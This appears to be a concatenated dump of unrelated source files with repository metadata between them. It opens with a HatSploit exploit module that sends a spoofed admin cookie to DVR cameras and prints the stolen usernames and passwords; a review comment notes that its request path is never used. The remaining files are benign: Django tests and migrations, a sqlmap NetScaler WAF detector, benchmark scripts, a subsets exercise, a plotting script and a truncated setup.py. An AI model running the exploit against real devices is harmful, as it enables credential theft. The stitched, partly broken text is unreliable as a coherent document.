# SOFTWARE.
#
import json
from core.lib.module import Module
from utils.http.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
    """DVR camera credentials disclosure.

    Sends a GET request with a spoofed ``uid=admin`` cookie and parses
    the JSON user list from the response, printing (uid, pwd, role)
    triples for each entry.
    """

    details = {
        'Name': "DVR Camera Credentials Disclosure",
        'Module': "exploit/unix/dvr/camera_credentials_disclosure",
        'Authors': [
            'Ivan Nikolsky (enty8080)',
            'ezelf'
        ],
        'Description': "DVR Camera credentials disclosure.",
        'Comments': [
            ''
        ],
        'Platform': "unix",
        'Risk': "high"
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        }
    }

    def exploit(self, remote_host, remote_port):
        """Query the device's user list and print any credentials found."""
        self.output_process("Generating payload...")
        cookies = {
            "uid": "admin"
        }
        # NOTE(review): `payload` looks like the intended request path,
        # but it is never passed to http_request (which therefore hits
        # the default path).  The HTTPClient API is not visible here, so
        # this is left unchanged — confirm whether a path/url argument
        # is needed.
        payload = '/device.rsp?opt=user&cmd=list'
        self.output_process("Sending payload...")
        response = self.http_request(
            method="GET",
            host=remote_host,
            port=remote_port,
            cookies=cookies
        )
        if response is None or response.status_code != 200:
            self.output_error("Failed to send payload!")
            return
        # Fix: `credentials` was appended to without ever being
        # initialised, raising NameError on the success path.
        credentials = []
        try:
            json_data = json.loads(response.text)
            for data in json_data["list"]:
                credentials.append((data["uid"], data["pwd"], data["role"]))
            self.print_table("Credentials", ('Username', 'Password', 'Role'), *credentials)
        except Exception:
            self.output_error("Credentials could not be found!")

    def run(self):
        """Module entry point: parse options and launch the exploit."""
        remote_host, remote_port = self.parse_options(self.options)
        self.output_process(f"Exploiting {remote_host}...")
        self.exploit(remote_host, remote_port)
|
[
"enty8080@gmail.com"
] |
enty8080@gmail.com
|
84cb538f8850e3ffa7072e85d2b0228a7d713a47
|
356f3f1b7caf0ccb20cc830d40821dfb2cbda046
|
/sfit/workout/doctype/workout_day/test_workout_day.py
|
8696ffbb32d632dbc281ece67008a9e16deb779d
|
[
"MIT"
] |
permissive
|
vignesharumainayagam/sfit
|
f4b75b9a8b2de08d0eaa4eadbcd3d5e432ffba56
|
a96afbf35b0e1635e44cb5f83d7f86c83abedb8f
|
refs/heads/master
| 2021-09-05T18:22:43.494208
| 2018-01-30T07:23:02
| 2018-01-30T07:23:02
| 104,332,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestWorkoutDay(unittest.TestCase):
    """Placeholder test case for the Workout Day doctype."""
|
[
"vigneshwaran@valiantsystems.com"
] |
vigneshwaran@valiantsystems.com
|
1f3e82b1570f82ea3bdfef2515882a87a08ed13e
|
8efe9a6c9489d798b5f5b610eb531d86924a1548
|
/src/products/migrations/0030_auto_20180305_0204.py
|
5a7d07b9df8306b0e3108784bcba1e778c6e7200
|
[] |
no_license
|
MarekBiczysko/naklisze_public
|
e8e6f7e61cdb83b74ea68862b40c061c0253767b
|
e53c0e8fefffbcfc3a8859976eb7b81cf6270847
|
refs/heads/master
| 2022-12-12T02:27:09.824803
| 2019-07-23T10:54:47
| 2019-07-23T10:54:47
| 198,410,666
| 0
| 0
| null | 2022-12-08T01:03:08
| 2019-07-23T10:46:57
|
Python
|
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-05 01:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11: rewrites the default values of two
    # Camera text fields (an English description blurb and a Polish
    # "param @ value" spec-table template).  Do not edit by hand.
    dependencies = [
        ('products', '0029_auto_20180305_0150'),
    ]
    operations = [
        migrations.AlterField(
            model_name='camera',
            name='description',
            field=models.TextField(default='\nA camera is an optical instrument for recording or capturing images, which may be stored locally, transmitted to another location, or both. The images may be individual still photographs or sequences of images constituting videos or movies. The camera is a remote sensing device as it senses subjects without any contact . The word camera comes from camera obscura, which means "dark chamber" and is the Latin name of the original device for projecting an image of external reality onto a flat surface. The modern photographic camera evolved from the camera obscura. The functioning of the camera is very similar to the functioning of the human eye. The first permanent photograph of a camera image was made in 1826 by Joseph Nicéphore Niépce.\n'),
        ),
        migrations.AlterField(
            model_name='camera',
            name='spec_table',
            field=models.TextField(blank=True, default="\nogniskowa @ 58 mm &\nkąt widzenia @ 32' szerokości &\nparametr @ wartość &\nkolejny parametr @ następna wartość &\n", max_length=300, null=True),
        ),
    ]
|
[
"marek.biczysko@stxnext.pl"
] |
marek.biczysko@stxnext.pl
|
edb41ced91b448c477e1ff798421c4a836d02c1c
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_None/trend_Lag1Trend/cycle_5/ar_/test_artificial_128_None_Lag1Trend_5__0.py
|
a2712b0471685b35c3361d00197c36c4f8dea080
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 258
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
# Generated benchmark case: 128 daily points, Lag1Trend trend, cycle
# length 5, no transform, zero noise, no exogenous data, AR order 0.
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 5, transform = "None", sigma = 0.0, exog_count = 0, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
5afe09e31c7ddd461bd0ca9ead432738d103c647
|
148072ce210ca4754ea4a37d83057e2cf2fdc5a1
|
/src/core/w3af/w3af/plugins/attack/db/sqlmap/waf/netscaler.py
|
04b6d4eca5614726a9e6be0a151109dfc48cf07b
|
[] |
no_license
|
ycc1746582381/webfuzzer
|
8d42fceb55c8682d6c18416b8e7b23f5e430c45f
|
0d9aa35c3218dc58f81c429cae0196e4c8b7d51b
|
refs/heads/master
| 2021-06-14T18:46:59.470232
| 2017-03-14T08:49:27
| 2017-03-14T08:49:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 812
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NetScaler (Citrix Systems)"
def detect(get_page):
    """Return True if the target shows Citrix NetScaler fingerprints.

    Probes the target once per attack vector and inspects response
    headers for NetScaler artifacts: scrambled keep-alive headers
    (Cneonction/nnCoection), NetScaler cookies (ns_af/citrix_ns_id/NSC_)
    and the NS-CACHE Via header.
    """
    retval = False

    for vector in WAF_ATTACK_VECTORS:
        page, headers, code = get_page(get=vector)
        retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
        # Fix: accumulate with |= — the original reassigned with '=',
        # silently discarding the Cneonction/nnCoection result above.
        retval |= re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
        retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
        if retval:
            break

    return retval
|
[
"everping@outlook.com"
] |
everping@outlook.com
|
c62bf5e407c19bc1d3059d7e8ee9abbaba6d7100
|
eb74806869a4340a6d8a2623bbe72bd4e64dcde8
|
/apps/rss_feeds/migrations/0006_feed_fs_size_bytes.py
|
cebc86363ae3a0e11564538d0d6f2f78ab934930
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
sictiru/NewsBlur
|
a0874a1044926d2268ba07a928e62fce5c9a8310
|
1ab88e4cc34775d00a1ac90ee08bc2498577e773
|
refs/heads/sictiru
| 2023-08-19T20:24:20.638019
| 2023-08-15T03:52:09
| 2023-08-15T03:52:09
| 250,445,213
| 1
| 0
|
MIT
| 2023-03-06T15:34:38
| 2020-03-27T05:05:44
|
Objective-C
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Generated by Django 3.1.10 on 2022-05-11 17:10
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1.10: adds a nullable integer column
    # `fs_size_bytes` to Feed.  Do not edit by hand.
    dependencies = [
        ('rss_feeds', '0005_feed_archive_subscribers'),
    ]
    operations = [
        migrations.AddField(
            model_name='feed',
            name='fs_size_bytes',
            field=models.IntegerField(blank=True, null=True),
        ),
    ]
|
[
"samuel@ofbrooklyn.com"
] |
samuel@ofbrooklyn.com
|
3b30a770bc9971f15e4f4a4cd43afbcdce5c6da2
|
cc9cf69b1534dc0d9530b4ff485084162a404e34
|
/leetcode/pass/leetcode_90.py
|
74fc6a05142615a6ecb6b64f80b6893234b2b510
|
[] |
no_license
|
NASA2333/study
|
99a58b2c9979201e9a4fae0c797391a538de6f45
|
ba63bc18f3c788090e43406315497329b00ec0a5
|
refs/heads/master
| 2021-05-03T22:26:52.541760
| 2018-02-07T02:24:55
| 2018-02-07T02:24:55
| 104,988,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
'''
Given a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
For example,
If nums = [1,2,2], a solution is:
[
[2],
[1],
[1,2,2],
[2,2],
[1,2],
[]
]
'''
from itertools import permutations
def subsetsWithDup(s):
    """Return every distinct subset of ``s`` as a sorted list (power set).

    Fixes two defects in the original:
    * the accumulator was a module-level list, so a second call
      returned stale results from the first call;
    * enumerating permutations and de-duplicating afterwards was
      wasteful — combinations of the sorted input already enumerate
      subsets in canonical (sorted) form.
    """
    from itertools import combinations
    nums = sorted(s)
    seen = []
    for size in range(len(nums) + 1):
        for combo in combinations(nums, size):
            subset = list(combo)
            # Duplicate elements in the input yield repeated combos;
            # keep only the first occurrence of each subset.
            if subset not in seen:
                seen.append(subset)
    return seen
print(subsetsWithDup([1,2,2]))
|
[
"422282539@qq.com"
] |
422282539@qq.com
|
8261febe86d08207fffb746dc4ea9b8bb4edf2f7
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/128/usersdata/195/33234/submittedfiles/al6.py
|
a43d19a9835509d9bcff514428b8a373c0912704
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# -*- coding: utf-8 -*-
# Read an integer and report whether it is prime, printing every proper
# divisor found along the way.
n=int(input('digite n:'))
contador=0
i=2
# Fix: the original looped `while i <= n`, so n % n == 0 always counted
# n itself as a divisor and every n >= 2 was reported as 'NÃO PRIMO'.
# Only divisors strictly between 1 and n disqualify a prime.
while i<n:
    if n%i==0:
        contador=contador+1
        print(i)
    i=i+1
# Numbers below 2 are not prime by definition.
if n>=2 and contador==0:
    print('PRIMO')
else:
    print('NÃO PRIMO')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
a7331b3ee43605f606716e225b6f3a8427eb2df6
|
4ae7cdc9292009398a292bdf6bee61428559fdfd
|
/SourceCodeTools/mltools/torch/__init__.py
|
3cf41a14372e44768224cab38988ebb371ea39dc
|
[] |
no_license
|
VitalyRomanov/method-embedding
|
52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8
|
1c8f0fc04eb1f495555272d9747fd2fea68525e1
|
refs/heads/master
| 2023-08-31T17:39:04.051912
| 2023-01-08T05:02:52
| 2023-01-08T05:02:52
| 219,153,628
| 5
| 7
| null | 2023-07-22T20:27:20
| 2019-11-02T12:54:12
|
Python
|
UTF-8
|
Python
| false
| false
| 308
|
py
|
import torch
def compute_accuracy(pred_, true_):
    """Fraction of positions where predictions equal the targets."""
    correct = (pred_ == true_).sum().item()
    return correct / len(true_)
def to_numpy(tensor):
    """Detach *tensor* from the autograd graph and return a NumPy array."""
    return tensor.detach().cpu().numpy()
def get_length_mask(target, lens):
    """Boolean mask (batch, seq): True where the position index < length."""
    positions = torch.arange(target.size(1), device=target.device)
    return positions.unsqueeze(0) < lens.unsqueeze(1)
|
[
"mortiv16@gmail.com"
] |
mortiv16@gmail.com
|
759b4b822b6a931f35052cc8ae753ec5e73d26ef
|
fab14fae2b494068aa793901d76464afb965df7e
|
/benchmarks/f3_wrong_hints/scaling_nonlinear_software/3-19_35.py
|
57bc6dce8fac1bc637a307a76bce16e0d73a5015
|
[
"MIT"
] |
permissive
|
teodorov/F3
|
673f6f9ccc25acdfdecbfc180f439253474ba250
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
refs/heads/master
| 2023-08-04T17:37:38.771863
| 2021-09-16T07:38:28
| 2021-09-16T07:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,903
|
py
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
                                              FNode]:
    """Build the benchmark transition system.

    Encodes a 5-location control-flow graph over integer variables
    pc, x, y, z and returns ``(symbols, init, trans, fairness)``:
    the symbol set, the initial condition (pc = 0), the transition
    relation (control-flow edges conjoined with per-edge update
    labels), and a fairness condition requiring pc never to reach
    the exit value -1 (a non-terminating run).
    """
    assert isinstance(env, PysmtEnv)
    mgr = env.formula_manager
    pc = mgr.Symbol("pc", types.INT)
    x = mgr.Symbol("x", types.INT)
    y = mgr.Symbol("y", types.INT)
    z = mgr.Symbol("z", types.INT)
    x_pc = symb_to_next(mgr, pc)
    x_x = symb_to_next(mgr, x)
    x_y = symb_to_next(mgr, y)
    x_z = symb_to_next(mgr, z)
    symbols = frozenset([pc, x, y, z])
    n_locs = 5
    int_bound = n_locs
    pcs = []
    x_pcs = []
    ints = [mgr.Int(i) for i in range(int_bound)]
    # Precompute pc = l / pc' = l predicates for every location l.
    for l in range(n_locs):
        n = ints[l]
        pcs.append(mgr.Equals(pc, n))
        x_pcs.append(mgr.Equals(x_pc, n))
    m_1 = mgr.Int(-1)
    pcend = mgr.Equals(pc, m_1)
    x_pcend = mgr.Equals(x_pc, m_1)
    # initial location.
    init = pcs[0]
    # control flow graph.
    cfg = mgr.And(
        # pc = -1 : -1,
        mgr.Implies(pcend, x_pcend),
        # pc = 0 & !(y >= 1) : -1,
        mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
        # pc = 0 & y >= 1 : 1,
        mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
        # pc = 1 & !(z >= 1) : -1,
        mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
        # pc = 1 & z >= 1 : 2,
        mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
        # pc = 2 & !(x >= 0) : -1,
        mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
        # pc = 2 & x >= 0 : 3,
        mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
        # pc = 3 : 4,
        mgr.Implies(pcs[3], x_pcs[4]),
        # pc = 4 : 2,
        mgr.Implies(pcs[4], x_pcs[2]))
    # transition labels.
    labels = mgr.And(
        # (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcend, x_pcend),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[0], x_pcend),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[0], x_pcs[1]),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[1], x_pcend),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[1], x_pcs[2]),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[2], x_pcend),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[2], x_pcs[3]),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
                    mgr.Equals(x_z, z))),
        # (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
        mgr.Implies(
            mgr.And(pcs[3], x_pcs[4]),
            mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
                    mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
        # (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
        mgr.Implies(
            mgr.And(pcs[4], x_pcs[2]),
            mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
                    mgr.Equals(x_z, z))))
    # transition relation.
    trans = mgr.And(cfg, labels)
    # fairness.
    fairness = mgr.Not(pcend)
    return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
    """Build the candidate hints for this benchmark instance.

    Returns three Hint automata (over x, over z, and over pc); each
    Location pairs a region invariant with a progress condition on the
    next-state value.  The enclosing benchmark suite is named
    "wrong_hints", so these are presumably not all helpful — not
    verified here.
    """
    assert isinstance(env, PysmtEnv)
    mgr = env.formula_manager
    pc = mgr.Symbol("pc", types.INT)
    x = mgr.Symbol("x", types.INT)
    y = mgr.Symbol("y", types.INT)
    z = mgr.Symbol("z", types.INT)
    symbs = frozenset([pc, x, y, z])
    x_pc = symb_to_next(mgr, pc)
    x_x = symb_to_next(mgr, x)
    x_y = symb_to_next(mgr, y)
    x_z = symb_to_next(mgr, z)
    res = []
    i_0 = mgr.Int(0)
    i_1 = mgr.Int(1)
    i_2 = mgr.Int(2)
    i_3 = mgr.Int(3)
    # Hint automaton over x: three locations.
    loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
    loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
    loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
    loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
    loc2 = Location(env, mgr.GT(x, i_3))
    loc2.set_progress(2, mgr.Equals(x_x, x))
    h_x = Hint("h_x4", env, frozenset([x]), symbs)
    h_x.set_locs([loc0, loc1, loc2])
    res.append(h_x)
    # Hint automaton over z: two locations alternating z and z+3.
    loc0 = Location(env, mgr.GE(z, i_0))
    loc0.set_progress(1, mgr.Equals(x_z, z))
    loc1 = Location(env, mgr.GE(z, i_0))
    loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
    h_z = Hint("h_z4", env, frozenset([z]), symbs)
    h_z.set_locs([loc0, loc1])
    res.append(h_z)
    # Hint automaton over pc: cycles through the loop locations 2-3-4.
    loc0 = Location(env, mgr.Equals(pc, i_2))
    loc0.set_progress(1, mgr.GT(x_pc, i_2))
    loc1 = Location(env, mgr.GE(pc, i_3))
    loc1.set_progress(2, mgr.GE(x_pc, i_3))
    loc2 = Location(env, mgr.GE(pc, i_3))
    loc2.set_progress(0, mgr.Equals(x_pc, i_2))
    h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
    h_pc.set_locs([loc0, loc1, loc2])
    res.append(h_pc)
    return frozenset(res)
|
[
"en.magnago@gmail.com"
] |
en.magnago@gmail.com
|
0c430c6aecd9750cc42ba607375c8993c00e350c
|
0b420532815a3841b74335e1e6ab9f3d533225c3
|
/day_night.py
|
a9501b87541c63bc5ae6e47f5b599ce2137cbdd2
|
[] |
no_license
|
akuhnregnier/npower
|
3d7ec12e2e21a6e23db96714391986d372e0e6e0
|
bf3d842cde9b2e311cd415a8da7786ed36909645
|
refs/heads/master
| 2021-06-11T21:23:55.221317
| 2016-11-17T16:32:06
| 2016-11-17T16:32:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,808
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 03 17:08:37 2016
@author: ahk114

Splits half-hourly temperature and demand samples into day/night
buckets, averages each bucket per day, and scatter-plots average
demand against average temperature.  (Python 2 script: print
statements, cPickle.)
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#import seaborn as sns
import cPickle as pickle
import os
from numpy.fft import fft
from numpy.fft import fftfreq
import scipy.optimize as opt
import copy
plt.close('all')
pd.options.display.expand_frame_repr = False
pd.options.display.max_columns = 15
source = 'round_1.xlsx'
picklefile = 'round1.pickle'
# Cache the parsed Excel sheet as a pickle so later runs skip the
# slow xlsx parse.
if not os.path.isfile(picklefile):
    df = pd.read_excel(source)
    with open(picklefile,'wb') as f:
        pickle.dump(df,f,protocol=2)
else:
    with open(picklefile,'rb') as f:
        df = pickle.load(f)
print "Rows, columns:", df.shape
temps = df['Temperature']
days = []
nights = []
# 48 half-hour slots per day: slots 0-11 and 36-47 count as night,
# 12-35 as day.
for i,temp in enumerate(temps):
    print "i",i
    if i%48<12 or i%48>=36:
        nights.append(temp)
    else:
        days.append(temp)
day_avg = []
night_avg = []
# Each day contributes 24 day samples and 24 night samples; average
# each run of 24 into one per-day value.
for i in range(0,len(days),24):
    print "i2"
    day_avg.append(np.mean(days[i:i+24]))
for i in range(0,len(nights),24):
    print "i3",i
    night_avg.append(np.mean(nights[i:i+24]))
dnight = []
dday = []
# Same day/night split for demand, skipping forecast placeholder rows.
for i,demand in enumerate(df['Demand'].loc[df['Demand'] != '?? FC1 ??']):
    print "i",i
    if i%48<12 or i%48>=36:
        dnight.append(demand)
    else:
        dday.append(demand)
demand_day_avg = []
demand_night_avg = []
for i in range(0,len(dday),24):
    print "i2"
    demand_day_avg.append(np.mean(dday[i:i+24]))
for i in range(0,len(dnight),24):
    print "i3",i
    demand_night_avg.append(np.mean(dnight[i:i+24]))
plt.figure()
# Truncate the temperature series to the (shorter) demand series before
# plotting demand vs. temperature.
plt.scatter(day_avg[:len(demand_day_avg)],demand_day_avg,c='g',label='day')
plt.scatter(night_avg[:len(demand_night_avg)],demand_night_avg,c='b',label='night')
plt.legend()
plt.xlabel('temperature')
plt.ylabel('demand')
|
[
"ahf.kuhnregnier@gmail.com"
] |
ahf.kuhnregnier@gmail.com
|
35bad535a079fa4d1c260581d0e8fc3ca1dd433a
|
59b72b8f662cd605b3ce31f54779c17e5ca066d0
|
/interview_q/leet_code/子集.py
|
d6aa3df0e62c43481165dd5041958cface2a3827
|
[] |
no_license
|
dongyang2/hello-world
|
c1f5853ccafd6b8f23836192547ab36f898e0891
|
1f859b53e2b21ed5a648da09b84950f03ec1b370
|
refs/heads/master
| 2022-12-11T22:07:22.853912
| 2022-11-24T03:52:35
| 2022-11-24T03:52:35
| 119,025,960
| 0
| 0
| null | 2018-01-26T10:09:58
| 2018-01-26T08:28:10
| null |
UTF-8
|
Python
| false
| false
| 2,388
|
py
|
# https://leetcode-cn.com/problems/subsets/
# coding: utf-8
# Python 3
# 给定一组不含重复元素的整数数组,返回该数组所有可能的子集,包括空集。
#
# 思路:直接使用“组合.py”文件的函数。
# 优化方法,观察输入n=10时的结果,发现后面的结果等于输入数组与前面的结果的差集。如,长度为9的子集,一定等于长度为10的子集减长度为1的子集的结果。
# 边界条件:
def erg_new_new(li, k, tmp, com):
    """Recursively collect all ascending length-``k`` selections.

    ``tmp`` is the partial selection built so far; every completed
    length-``k`` selection is appended to the shared output list
    ``com``.  Candidates smaller than the last chosen element are
    skipped so selections stay in ascending order.
    """
    n = len(tmp)
    if n == k:
        com.append(tmp)
    else:
        for i in range(len(li)):
            if n > 0 and li[i] < tmp[-1]:
                continue
            elif n <= k-1:
                # erg_new_new(li[i+1:], k, append_val(tmp, li[i]), com)
                erg_new_new(li[i + 1:], k, tmp+[li[i]], com)
def combination(li, k):
    """Return every k-element combination of ``li`` (ascending order)."""
    n = len(li)
    # Degenerate sizes are answered directly.
    if k > n or k == 0:
        return []
    if k == 1:
        return [[x] for x in li]
    if k == n:
        return [li]

    out = []

    def extend(candidates, chosen):
        # Grow `chosen` one element at a time, always moving rightwards
        # through `candidates`, and record completed selections.
        if len(chosen) == k:
            out.append(chosen)
            return
        for idx, value in enumerate(candidates):
            if chosen and value < chosen[-1]:
                continue
            if len(chosen) <= k - 1:
                extend(candidates[idx + 1:], chosen + [value])

    extend(li, [])
    return out
def sub_set(li):
    """Return all subsets (the power set) of ``li`` as a flat list of lists.

    Only combinations up to size n/2 are enumerated directly; every
    larger subset is produced as the complement (via ``difference``) of
    a smaller one already found.  Assumes the elements of ``li`` are
    distinct (see the module header).
    """
    ss = [[[]]]
    sorted_li = sorted(li)
    n = len(li)
    half = int(n/2)
    # Small subsets: sizes 1 .. n//2, enumerated directly.
    for i in range(1, half+1):
        ss.append(combination(sorted_li, i))
    # For even n, size n/2 must not be complemented again, hence the +1.
    if n % 2 == 0:
        start_reverse = n-half+1
    else:
        start_reverse = n-half
    # Large subsets: size i is the complement of size n-i.
    for i in range(start_reverse, n+1):
        tmp = []
        for j in ss[n-i]:
            tmp.append(difference(li, j))
        ss.append(tmp)
    ans = []
    for i in ss:
        ans += i
    return ans
def difference(li, sub_li):
    """Elements of ``li`` not present in ``sub_li``, original order kept."""
    remaining = []
    for item in li:
        if item not in sub_li:
            remaining.append(item)
    return remaining
def main():
    """Demonstrate list-concatenation corner cases, then run the helpers."""
    tmp = []
    tmp += []
    print(tmp)
    tmp = [[]]
    tmp += []  # += with an empty list concatenates nothing (no extra empty list is added)
    print(tmp)
    tmp = [[]]
    tmp += [[]]  # to append an empty list itself, wrap it in another list
    print(tmp)
    tmp = [[]]
    tmp += [[1], [2]]
    print(tmp)
    li1 = [1, 3, 5, 6]
    li2 = [4, 6]
    print(difference(li1, li2))
    li1 = [1, 3, 5, 6]
    li2 = []
    print(difference(li1, li2))
    n = 20
    li = [x+1 for x in range(n)]
    # print(combination(li, 5))
    print(sub_set(li))
if __name__ == '__main__':
    import time
    # Bracket the demo run with start/end timestamps.
    print('-' * 15, 'Start', time.ctime(), '-' * 15, '\n')
    main()
    print('%s%s %s %s %s' % ('\n', '-' * 16, 'End', time.ctime(), '-' * 16))
|
[
"dongyangzhao@outlook.com"
] |
dongyangzhao@outlook.com
|
e25d5c6d44603dfc1ac7be40c0f5e63bce951fac
|
332ac6deaed8b8917cf874f04fc77246378bdb44
|
/setup.py
|
4db61d01cd37dbb3dd83d18bdb2eb0d4634cfe76
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
hestela/fauxmo
|
5a435399eca61c525502dc90333ee73cff0d3d15
|
f2246b952a0246bf0dcd74e770c9daea0dcaa763
|
refs/heads/master
| 2020-03-11T15:45:48.414168
| 2018-04-19T00:56:27
| 2018-04-19T01:08:35
| 130,095,227
| 0
| 0
| null | 2018-04-18T16:58:43
| 2018-04-18T16:58:43
| null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
import re
from setuptools import setup, find_packages
# Prefer pandoc-converted reST for the PyPI long description; fall back
# to the raw Markdown text when pypandoc is not installed.
try:
    import pypandoc
    readme = pypandoc.convert('README.md', 'rst')
    history = pypandoc.convert('CHANGELOG.md', 'rst')
except ImportError:
    with open('README.md') as readme_file, \
        open('CHANGELOG.md') as history_file:
        readme = readme_file.read()
        history = history_file.read()
# dev requirements are a superset of the test requirements.
with open('requirements-dev.txt') as dev_requirements_file, \
        open('requirements-test.txt') as tests_requirements_file:
    test_requirements = tests_requirements_file.read().splitlines()
    dev_requirements = dev_requirements_file.read().splitlines()
    dev_requirements.extend(test_requirements)
# Extract the version from src/fauxmo/__init__.py (single source of
# truth), matching e.g. __version__ = "v1.2.3".
version_regex = re.compile(r'__version__ = [\'\"]v((\d+\.?)+)[\'\"]')
with open('src/fauxmo/__init__.py') as f:
    vlines = f.readlines()
__version__ = next(re.match(version_regex, line).group(1) for line in vlines
                   if re.match(version_regex, line))
setup(
    name="fauxmo",
    version=__version__,
    description="Emulated Belkin WeMo devices that work with the Amazon Echo",
    long_description=readme + "\n\n" + history,
